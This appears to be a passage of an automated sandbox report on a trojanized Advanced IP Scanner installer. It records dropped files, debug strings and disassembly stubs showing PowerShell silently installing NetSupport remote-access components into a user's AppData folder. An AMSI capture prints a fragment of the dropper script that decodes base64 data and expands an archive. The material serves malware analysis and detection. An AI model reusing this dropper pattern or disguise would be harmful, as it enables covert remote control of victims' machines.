Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: KC0uZWwr8p.exe | Static file information: File size 21424072 > 1048576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll
Source: KC0uZWwr8p.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.4097717699.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2035313904.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2122570956.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-5C3J6.tmp.1.dr
Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdba source: is-BPHN2.tmp.1.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb00 source: is-Q62S4.tmp.1.dr
Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-RT7U6.tmp.1.dr
Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-MR0EO.tmp.1.dr
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2035069652.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2120902471.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, msvcr100.dll.3.dr
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Widgets.pdb source: is-MH1O8.tmp.1.dr
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1945716217.0000000007043000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: is-FLT6F.tmp.1.dr
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
Source: Binary string: client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr
Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdb source: is-BPHN2.tmp.1.dr
Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb source: is-Q62S4.tmp.1.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.4097611987.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2035242629.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2122115780.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.3.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: is-AQQBN.tmp.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: is-5KHP2.tmp.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: is-L4L9S.tmp.1.dr

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($encodedData);[System.IO.File]::WriteAllBytes($archiveFile, $decodedBytes);New-Item -ItemType Directory -Path $installPath;Expand-Archive -Path $archiveFile -DestinationPath $installP
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 7_2_11029230
Source: KC0uZWwr8p.exe | Static PE information: section name: .didata
Source: KC0uZWwr8p.tmp.0.dr | Static PE information: section name: .didata
Source: is-LEVQP.tmp.1.dr | Static PE information: section name: .didata
Source: is-OESQ5.tmp.1.dr | Static PE information: section name: .didat
Source: is-DORH9.tmp.1.dr | Static PE information: section name: .00cfg
Source: is-1PGBC.tmp.1.dr | Static PE information: section name: .qtmetad
Source: is-F8M60.tmp.1.dr | Static PE information: section name: .qtmetad
Source: PCICL32.DLL.3.dr | Static PE information: section name: .hhshare
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_07279CE5 push FFFFFFE8h; ret 3_2_07279CE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_07FD0C50 push eax; ret 3_2_07FD0C63
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1116B825 push ecx; ret 7_2_1116B838
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11166719 push ecx; ret 7_2_1116672C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11040641 push 3BFFFFFEh; ret 7_2_11040646
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685C6BBF push ecx; ret 7_2_685C6BD2
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685C4DF5 push 685C43F9h; retf 7_2_685C4E1F
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685B8377 push 3BFFFFFFh; retf 7_2_685B837C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685BE36C push edi; ret 7_2_685BE37B
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685BE3F7 push edi; ret 7_2_685BE3F9
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685B94C5 push ecx; ret 7_2_685B94D8
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_687E0995 push ecx; ret 7_2_687E09A8
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_1116B825 push ecx; ret 8_2_1116B838
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_11166719 push ecx; ret 8_2_1116672C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_11040641 push 3BFFFFFEh; ret 8_2_11040646
Source: msvcr100.dll.3.dr | Static PE information: section name: .text entropy: 6.909044922675825
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-MH1O8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-LEVQP.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-92N74.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-MB1RQ.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-OESQ5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-56HU1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-QDVS6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-2QTH6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-A7U9L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-U7801.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-V3C3T.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-PELB8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-4U5GH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-Q62S4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-NB2QQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-012CR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-QAKOH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-5BNS6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | File created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5JUJC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5C3J6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-BPHN2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-F8M60.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-TE3AT.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-UCVS8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-1PGBC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-AQQBN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-MR0EO.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmpJump to dropped file
